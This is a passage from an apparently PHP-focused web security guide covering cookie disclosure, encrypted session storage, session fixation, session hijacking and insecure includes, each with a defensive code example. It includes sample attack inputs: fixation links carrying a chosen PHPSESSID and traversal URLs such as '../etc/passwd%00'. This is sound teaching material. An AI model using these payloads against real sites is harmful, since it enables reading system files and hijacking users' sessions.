One risk associated with the use of cookies is that a user's cookies can be stolen by an attacker. If the session identifier is kept in a cookie, cookie disclosure is a serious risk, because it can lead to session hijacking.
Figure 4-2: PHP handles the complexity of session management for you
The two most common causes of cookie disclosure are browser vulnerabilities and cross-site scripting (discussed in Chapter 2). While no such browser vulnerabilities are known at this time, there have been a few in the past—the most notable ones are in Internet Explorer Versions 4.0, 5.0, 5.5, and 6.0 (corrective patches are available for each of these vulnerabilities).
While browser vulnerabilities are certainly not the fault of web developers, you may be able to take steps to mitigate the risk to your users. In some cases, you may be able to implement safeguards that practically eliminate the risk. At the very least, you can try to educate your users and direct them to a patch to fix the vulnerability.
For these reasons, it is good to be aware of new vulnerabilities. There are a few web sites and mailing lists that you can keep up with, and many services are beginning to offer RSS feeds, so that you can simply subscribe to the feed and be alerted to new vulnerabilities. SecurityFocus maintains a list of software vulnerabilities at http://online.securityfocus.com/vulnerabilities, and you can filter these advisories by vendor, title, and version. The PHP Security Consortium also maintains summaries of the SecurityFocus newsletters at http://phpsec.org/projects/vulnerabilities/securityfocus.html.
Cross-site scripting is a more common approach used by attackers to steal cookies. An attacker can use several approaches, one of which is described in Chapter 2. Because client-side scripts have access to cookies, all an attacker must do is write a script that delivers this information. Creativity is the only limiting factor.
Exposed Session Data
Session data often consists of personal information and other sensitive data. For this reason, the exposure of session data is a common concern. In general, the exposure is minimal, because the session data store resides in the server environment, whether in a database or the filesystem. Therefore, session data is not inherently subject to public exposure.
Enabling SSL is a particularly useful way to minimize the exposure of data being sent between the client and the server, and this is very important for applications that exchange sensitive data with the client. SSL provides a layer of security beneath HTTP, so that all data within HTTP requests and responses is protected.
If you are concerned about the security of the session data store itself, you can encrypt it so that session data cannot be read without the appropriate key. This is most easily achieved in PHP by using session_set_save_handler() and writing your own session storage and retrieval functions that encrypt session data being stored and decrypt session data being read. See Appendix C for more information about encrypting a session data store.
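A rough sketch of such a handler follows. It assumes PHP 8 and the OpenSSL extension, stores each session in its own file, and encrypts with AES-256-GCM. The class name, file naming scheme, and storage format are illustrative choices and not the implementation from Appendix C:

```php
<?php

/**
 * File-backed session handler that encrypts session data at rest.
 * Each file holds nonce (12 bytes) . tag (16 bytes) . ciphertext.
 */
final class EncryptedSessionHandler implements SessionHandlerInterface
{
    public function __construct(private string $dir, private string $key) {}

    public function open(string $path, string $name): bool
    {
        return is_dir($this->dir);
    }

    public function close(): bool
    {
        return true;
    }

    public function read(string $id): string|false
    {
        $file = $this->file($id);
        if (!is_file($file)) {
            return ''; // no data stored yet for this session
        }
        $raw = file_get_contents($file);
        if ($raw === false || strlen($raw) < 28) {
            return '';
        }
        $plain = openssl_decrypt(
            substr($raw, 28), 'aes-256-gcm', $this->key,
            OPENSSL_RAW_DATA, substr($raw, 0, 12), substr($raw, 12, 16)
        );

        // Treat undecryptable data as an empty session.
        return $plain === false ? '' : $plain;
    }

    public function write(string $id, string $data): bool
    {
        $nonce = random_bytes(12);
        $tag = '';
        $cipher = openssl_encrypt(
            $data, 'aes-256-gcm', $this->key, OPENSSL_RAW_DATA, $nonce, $tag
        );

        return $cipher !== false
            && file_put_contents($this->file($id), $nonce . $tag . $cipher, LOCK_EX) !== false;
    }

    public function destroy(string $id): bool
    {
        $file = $this->file($id);

        return !is_file($file) || unlink($file);
    }

    public function gc(int $max_lifetime): int|false
    {
        $removed = 0;
        foreach (glob($this->dir . '/sess_*') ?: [] as $file) {
            if (filemtime($file) + $max_lifetime < time() && unlink($file)) {
                $removed++;
            }
        }

        return $removed;
    }

    private function file(string $id): string
    {
        // Hash the identifier so it can never contribute path components.
        return $this->dir . '/sess_' . hash('sha256', $id);
    }
}

// Registration, before session_start(). $key is 32 random bytes loaded from
// somewhere other than the session store, and the path is a placeholder:
// session_set_save_handler(new EncryptedSessionHandler('/path/to/sessions', $key), true);
```

Once the handler is registered, the rest of the application continues to use $_SESSION as usual; only the stored representation changes.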
Session Fixation
A major concern regarding sessions is the secrecy of the session identifier. If this is kept secret, there is no practical risk of session hijacking. With a valid session identifier, an attacker is much more likely to successfully impersonate one of your users.
An attacker can use three primary methods to obtain a valid session identifier:
  • Prediction
  • Capture
  • Fixation
PHP generates a very random session identifier, so prediction is not a practical risk. Capturing a session identifier is more common—minimizing the exposure of the session identifier, using SSL, and keeping up with browser vulnerabilities can help you mitigate the risk of capture.
Keep in mind that a browser includes a Cookie header in all requests that satisfy the requirements set forth in a previous Set-Cookie header. Quite commonly, the session identifier is being exposed unnecessarily in requests for embedded resources, such as images. For example, to request a web page with 10 images, the session identifier is being sent by the browser in 11 different requests, but it is needed for only 1 of those. To avoid this unnecessary exposure, you might consider serving all embedded resources from a server with a different domain name.
Session fixation is an attack that tricks the victim into using a session identifier chosen by the attacker. It is the simplest method by which the attacker can obtain a valid session identifier.
In the simplest case, a session fixation attack uses a link:
    <a href="http://example.org/index.php?PHPSESSID=1234">Click Here</a>
Another approach is to use a protocol-level redirect:
    <?php

    header('Location: http://example.org/index.php?PHPSESSID=1234');

    ?>
The Refresh header can also be used—provided as an actual HTTP header or in the http-equiv attribute of a meta tag. The attacker's goal is to get the user to visit a URL that includes a session identifier of the attacker's choosing. This is the first step in a basic attack; the complete attack is illustrated in Figure 4-3.
Session Hijacking
The most common session attack is session hijacking. This refers to any method that an attacker can use to access another user's session. The first step for any attacker is to obtain a valid session identifier, and therefore the secrecy of the session identifier is paramount. The previous sections on exposure and fixation can help you to keep the session identifier a shared secret between the server and a legitimate user.
The principle of Defense in Depth (described in Chapter 1) can be applied to sessions—some minor safeguards can offer some protection in the unfortunate case that the session identifier is known by an attacker. As a security-conscious developer, your goal is to complicate impersonation. Every obstacle, however minor, offers some protection.
The key to complicating impersonation is to strengthen identification. The session identifier is the primary means of identification, and you want to select other data that you can use to augment this. The only data you have available is the data within each HTTP request:
    GET / HTTP/1.1
    Host: example.org
    User-Agent: Firefox/1.0
    Accept: text/html, image/png, image/jpeg, image/gif, */*
    Cookie: PHPSESSID=1234
You want to recognize consistency in requests and treat any inconsistent behavior with suspicion. For example, while the User-Agent header is optional, clients that send it rarely alter its value. If the user with a session identifier of 1234 has been using Mozilla Firefox consistently since logging in, a sudden switch to Internet Explorer should be treated with suspicion. Prompting for the password at that point is an effective way to mitigate the risk with minimal impact on your legitimate users in the case of a false alarm. You can check for User-Agent consistency as follows:
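    <?php

    session_start();

    /* The User-Agent header is optional, so fall back to an empty string. */
    $agent_hash = md5(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');

    if (isset($_SESSION['HTTP_USER_AGENT']))
    {
      /* Compare against the fingerprint stored on the first request. */
      if ($_SESSION['HTTP_USER_AGENT'] !== $agent_hash)
      {
        /* Prompt for password */
        exit;
      }
    }
    else
    {
      /* First request in this session: remember the fingerprint. */
      $_SESSION['HTTP_USER_AGENT'] = $agent_hash;
    }

    ?>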
Chapter 5: Includes
As PHP projects grow, software design and organization play critical roles in the maintainability of the code. Although opinions concerning best practices are somewhat inconsistent (and a debate about the merits of object-oriented programming often ensues), almost every developer understands and appreciates the value in a modular design.
This chapter addresses security issues related to the use of includes—files that you include or require in a script to divide your application into separate logical units. I also highlight and correct some common misconceptions, particularly those concerning best practices.
References to include and require should also be assumed to include include_once and require_once.
Exposed Source Code
A major concern regarding includes is the exposure of source code. This concern is largely a result of the following common situation:
  • Includes use a .inc file extension.
  • Includes are stored within document root.
  • Apache has no idea what type of resource a .inc file is.
  • Apache has a DefaultType of text/plain.
This state results in your includes being accessible via URL. Worse, they are not parsed by PHP and instead are treated as plain text, resulting in your source code being displayed in the user's browser (see Figure 5-1).
Figure 5-1: Raw source code displayed in a browser
This problem is very easy to avoid. Simply organize your application so that all includes are stored outside of document root. In fact, a best practice is to consider all files stored within document root to be public.
While this may sound unnecessarily paranoid, many situations can cause your source code to be revealed. I have witnessed Apache configuration files being overwritten by mistake (and going unnoticed until the next restart), inexperienced system administrators upgrading Apache but forgetting to add PHP support, and a handful of other scenarios that can expose source code.
By storing as much of your PHP code outside of document root as possible, you limit this risk of exposure. At the very least, all includes should be stored outside of document root as a best practice.
Several practices can limit the likelihood of source code exposure but do not address the root cause of the problem. These include instructing Apache to process .inc files as PHP, using a .php file extension for includes, and instructing Apache to deny requests for .inc resources:
    <Files ~ "\.inc$">
        Order allow,deny
        Deny from all
    </Files>
While these approaches have merit, none of them is as strong as placing includes outside of document root. Do not rely on these approaches for protection. At most, they can be used for Defense in Depth.
Backdoor URLs
Backdoor URLs are resources that can be accessed directly via URL when direct access is unintended or undesired. For example, a web application might display sensitive information to authenticated users:
    <?php

    $authenticated = FALSE;
    $authenticated = check_auth();

    /* ... */

    if ($authenticated)
    {
        include './sensitive.php';
    }

    ?>
Because sensitive.php is within document root, it can be accessed directly from a browser, bypassing the intended access control. This is because every resource within document root has a corresponding URL. In some cases, these scripts may perform a critical action, escalating the risk.
In order to prevent backdoor URLs, make sure you store your includes outside of document root. The only files that should be stored within document root are those that absolutely must be accessible via URL.
Filename Manipulation
Many situations warrant the use of dynamic includes, where part of the pathname or filename is stored in a variable. For example, you can cache some dynamic parts of your pages to alleviate the burden on your database server:
    <?php

    include "/cache/{$_GET['username']}.html";

    ?>
To make the vulnerability more obvious, this example uses $_GET. The same vulnerability exists when any tainted data is used—using $_GET['username'] is an extreme example used for clarity.
While this approach has merit, it also provides an attacker with the perfect opportunity to choose which cached file is displayed. For example, a user can easily view another user's cached file by modifying the value of username in the URL. In fact, an attacker can display any .html file stored within /cache simply by using the name of the file (without the extension) as the value of username:
    http://example.org/index.php?username=filename
Although an attacker is bound by the static portions of the path and filename, manipulating the filename isn't the only concern. A creative attacker can traverse the filesystem, looking for other .html files located elsewhere, hoping to find ones that contain sensitive data. Because .. indicates the parent directory, this string can be used for the traversal:
    http://example.org/index.php?username=../admin/users
This results in the following:
    <?php

    include "/cache/../admin/users.html";

    ?>
In this case, .. refers to the parent directory of /cache, which is the root directory. This is effectively the same as the following:
    <?php

    include "/admin/users.html";

    ?>
Because every file on the filesystem is within the root directory, this approach allows an attacker to access any .html resource on your server.
On some platforms, an attacker can supply a NULL byte (URL-encoded as %00) in the URL to terminate the string, so that the static .html suffix is ignored. For example:
    http://example.org/index.php?username=../etc/passwd%00
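One way to close off these manipulations is to filter the value before it reaches include, accepting only characters that a username is expected to contain. The sketch below is an assumption-laden example: the helper name cache_path_for() and the allowed character set (letters, digits, and underscores) are hypothetical and should be adapted to your own naming rules:

```php
<?php

/**
 * Return the cache file path for a username, or null when the value
 * contains anything other than letters, digits, and underscores.
 */
function cache_path_for(string $username): ?string
{
    // \A and \z anchor the whole string, so "../", "/", and NULL bytes
    // all cause the match to fail.
    if (preg_match('/\A[A-Za-z0-9_]+\z/', $username) !== 1) {
        return null;
    }

    return "/cache/{$username}.html";
}

// Typical use:
// $path = cache_path_for(isset($_GET['username']) ? $_GET['username'] : '');
// if ($path !== null) { include $path; }
```

This prevents directory traversal and string termination, but it does not stop one user from requesting another user's cached file by name; that still requires checking the value against the authenticated user.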
Code Injection